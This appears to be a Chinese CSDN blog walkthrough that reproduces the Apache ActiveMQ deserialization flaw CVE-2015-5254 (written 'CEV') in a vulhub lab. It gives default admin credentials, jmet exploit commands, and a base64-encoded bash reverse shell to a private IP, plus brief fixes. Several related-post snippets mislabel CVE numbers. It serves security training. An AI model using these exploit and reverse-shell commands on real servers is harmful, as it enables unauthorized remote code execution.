漏洞复现-CEV-2015-5254

已于 2022-06-27 16:29:29 修改
阅读量255 收藏
点赞数
分类专栏: web安全 漏洞复现 文章标签: 安全 java linux
于 2021-12-15 14:28:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59350385/article/details/119823185
版权

CEV-2015-5254
一、漏洞原理
二、攻击思路
三、漏洞复现
四、反弹shell
五、修补建议
一、漏洞原理
漏洞没有限制在代理中序列化的类,远程攻击者可以借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。
细节参考:https://xz.aliyun.com/t/2015

二、攻击思路
所需设备:PC1构建攻击:有java环境
PC2反弹hell:kali
服务器:vulhub(有Apache ActiveMQ < 5.x)
注:PC1和PC2可以用一台电脑模拟


三、漏洞复现
1、开启vulhub:进入activemq/CEV-2015-5254目录执行

docker-compose up -d
1

2、查看开启端口netstat -anpt,有8161和61616,8161是进行访问服务的,61616是接收服务的。访问服务:http://172.17.0.1:8161/。


3、访问http://172.17.0.1:8161/admin/页面用账号admin和密码admin进行登录。

4、在PC1上下载工具jmet:https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar,并在同级目录创建external目录。

5、PC1构造消息进行钓鱼:java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -Y “touch /tmp/success” -Yp ROME 192.168.11.133 61616。

6、服务器查看Browse event模块看到消息,当管理员点击消息触发攻击。


7、服务器查看docker的id:docker ps -a,进入docker:docker exec -it 0056cf6cea37 bash查看tmp目录,有success文件攻击成功。

四、反弹shell
1、前面思路都类似就是攻击代码不同,中间的反弹shell代码用base64加密bash -i >& /dev/tcp/192.168.11.128/19111 0>&1。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExLjEyOC8xOTExMSAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.11.133 61616
1

2、PC2用kali监听19111端口。

3、管理员点击消息,查看kali,反弹shell成功。

五、修补建议
1、升级到最新版本
2、用WAF进行拦截

_s1mple
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CEV-2018-0802 Microsoft Office漏洞复现
afei001
03-26 518
漏洞产生背景     在潜伏17年的“噩梦公式”漏洞(CVE-2017-11882)被曝光修补之后,之前的漏洞程序EQNEDT32.EXE在windows 10系统下仍然没有开启ASLR保护,因此其利用非常容易,在修补之后可以发现微软的发布的是二进制补丁而不是对该程序源码进行重新编译,因此猜测该程序的源码可能已经遗失,如果真实情况是这样,那么公式编辑器这个进程将成为其他漏洞发现和利用的“圣地”,因...
weblogic-CEV反序列化补丁p28483404_BHT3反序列化补丁
01-11
weblohic-CEV-安全漏洞补丁,p28483404_BHT3反序列化补丁-CVE-2017-2018 是weblogic wls-wsat组件的一个xml反序列化漏洞补丁,该漏洞可造成远程命令执行。下载part1,part2再加上补丁文档就可以搞定
五分钟复现Activemq反序列化漏洞——CEV-2015-5254漏洞
liaowang321的博客
03-18 323
五分钟复现Activemq反序列化漏洞——CEV-2015-5254漏洞一、漏洞原理二、攻击思路三、漏洞复现反弹shell五、修补建议 一、漏洞原理 漏洞没有限制在代理中序列化的类,远程攻击者可以借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 细节参考:https://xz.aliyun.com/t/2015 二、攻击思路 所需设备:PC1构建攻击:有java环境 PC2反弹hell:kali 服务器:vulhub(有Apache ActiveMQ &lt
漏洞复现-Log4j2远程代码执行漏洞(CEV-2015-5254)
qq_59350385的博客
12-15 3744
目录 Windows环境搭建 ubuntu环境搭建 攻击复现 Windows环境搭建 1.安装java1.8版本 2.打开受影响版本的jar包,文件放在了百度网盘中,请自取 链接:https://pan.baidu.com/s/1Jn-hXXv2uXc_W06bJ9-46Q 提取码:c4qy ubuntu环境搭建 1.安装默认JRE / JDK 接下来,检查是否已安装Javajava -version 如果当前未安装Java,您将看到以下输出.........
office_2003_2016_CEV-2017-11882漏洞复现
小羊的博客
11-26 313
漏洞复现
利用windows 7 CEV-2019-0708漏洞
jcs233的博客
12-28 1349
这意味着一些客户,尤其是那些正在运行不再获得主流支持的Windows版本的客户,将不会收到任何安全更新来保护他们的系统免遭CVE-2019-0708的攻击。该漏洞存在于Windows系统的Remote Desktop Services(远程桌面服务)(端口3389)中,未经身份验证的攻击者可以通过发送特殊构造的数据包触发漏洞,可能导致远程无需用户验证控制系统。这意味着该漏洞可以通过网络蠕虫的方式被利用,利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。
exercicios-python-cev:Python练习
03-09
"exercicios-python-cev"是一个针对初学者和进阶者设计的Python练习项目,旨在帮助学习者通过解决实际问题来巩固和深化对Python语法、数据结构、函数、控制流以及算法的理解。这个项目包含了多个练习题目,涵盖了...
weblogic-CEV反序列化补丁p28483404安装升级方法安装升级指导
01-11
WEBLOGIC-CEV反系列化漏洞是常风的高危漏洞。可以远程通过漏洞执行恶意代码,上传文件,此漏洞扫描会经常扫出,所以必须进行安全加固,具体安全加固方法见文档,里面有具体说明步骤,简单的几步就可以解决这个漏洞,...
论文研究 - CEV型Heston模型的Malliavin可微性
05-15
众所周知,Malliavin演算可以应用于具有Lipschitz连续系数的随机微分方程,以阐明解的存在性和平滑性。 本文将Malliavin演算应用于扩散系数为非Lipschitz连续的CEV型Heston模型,并证明了该模型的Malliavin可微性。
rehl4.X,5.X,6.X bash升级包 针对漏洞CEV-2014-6271
10-14
每个相应版本对应bash rpm两个一个64位一个32位 官网下载 可以对照MD5 软件列表: bash-3.0-27.el4.i386.rpm bash-3.0-27.el4.x86_64.rpm bash-3.2-33.el5_11.4.i386.rpm bash-3.2-33.el5_11.4.x86_64.rpm ...
五分钟复现activemq任意文件上传漏洞——CEV-2016-3088漏洞
liaowang321的博客
03-19 1673
五分钟复现activemq任意文件上传漏洞——CEV-2016-3088漏洞 目录五分钟复现activemq任意文件上传漏洞——CEV-2016-3088漏洞一、背景简述二、漏洞原理三、攻击思路四、写入webshell五、写入crontab,自动化弹shell六、修复建议 一、背景简述 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver
ActiveMQ漏洞
温和的跳跃
07-25 144
基于序列化实现的协议 那个那个那个那个ins截图为什么会被知道呢 应该是软件 拥有手机截图权限 但是可以拍照啊✌。电脑应该不会被知道吧
安全狐】CVE-2015-5254_ActiveMQ反序列化漏洞复现
安全狐
06-06 229
CVE-2015-5254_ActiveMQ反序列化漏洞复现 0x01漏洞背景 ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 0x02环境搭建 vulhub的docker环境搭建
几个cve漏洞库查询网站
热门推荐
zhongxj183的博客
08-06 4万+
分享几个cve漏洞库查询网站,自己在工作中经常用到 阿里云漏洞库 https://avd.aliyun.com/nvd/list tenable漏洞库(nessus) https://www.tenable.com/cve/search https://cve.mitre.org/cve/search_cve_list.html https://nvd.nist.gov/vuln/search https://www.securityfocus.com/bid ...
CEV-2020-0796复现
Ch_an_ger的博客
06-24 996
一、漏洞原理 该漏洞是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的,它可让远程且未经身份验证的攻击者在目标系统上执行任意代码。 二、影响版本 适用于32位系统的Windows 10版本1903 Windows 10 1903版(用于基于x64的系统) Windows 10 1903版(用于基于ARM64的系统) Windows Server 1903版(服务器核心安装) 适用于32位系统的Windows 10版本1909 Windows 10版本1909(用于基于x64的系统) Windows 1
CVE CNVD CNNVD
最新发布
akdjfhx的博客
02-27 353
CVE CNVD CNNVD
几个cve漏洞库查询网站-什么是CVE?常见漏洞和暴露列表概述
学习 记录 总结 分享
03-17 8833
CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称。使用一个共同的名字,可以帮助用户在各自独立的各种漏洞数据库中和漏洞评估工具中共享数据,虽然这些工具很难整合在一起。如果在一个漏洞报告中指明的一个漏洞,如果有CVE名称,你就可以快速地在任何其它CVE兼容的数据库中找到相应修补的信息,解决安全问题。原文链接:https://blog.csdn.net/zhongxj183/article/details/119456735。tenable漏洞库(nessus)
什么是CVE?常见漏洞和暴露列表概述
Trinity_Techologies的博客
05-18 1万+
常见漏洞和暴露(Common Vulnerability and Exposures,简称CVE)收集了已知的网络安全漏洞和暴露,以帮助您更好地保护您的嵌入式软件。 在这里,我们会阐释什么是CVE,CVE列表中包括哪些内容,以及它如何帮助确保您的软件是安全的。
CVE公共漏洞和暴露的学习
charm_1981的博客
05-21 2万+
CVE公共漏洞和暴露原著:潘柱廷    注释:ccnupq1 CVE的产生背景随着最近一些年来在全球范围的黑客入侵不断猖獗,信息安全问题越来越严重。在对抗黑客入侵的安全技术中,实时入侵检测和漏洞扫描评估(IDnA -Intrusion Detection and Assessment)的技术和产品已经开始占据越来越重要的位置。目前实时入侵检测和漏洞扫描评估基于的主要方法还是“已知入侵手法检测”和“...
cev-2015-8660
01-07
CEV-2015-8660是欧洲排球联赛(CEV)于2015年发布的一项文件编号。根据CEV官方规定,文件编号CEV-2015-8660可能是有关比赛赛程安排、参赛规则、技术规定或其他与排球比赛相关的文件。这些文件通常用于指导和管理欧洲...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值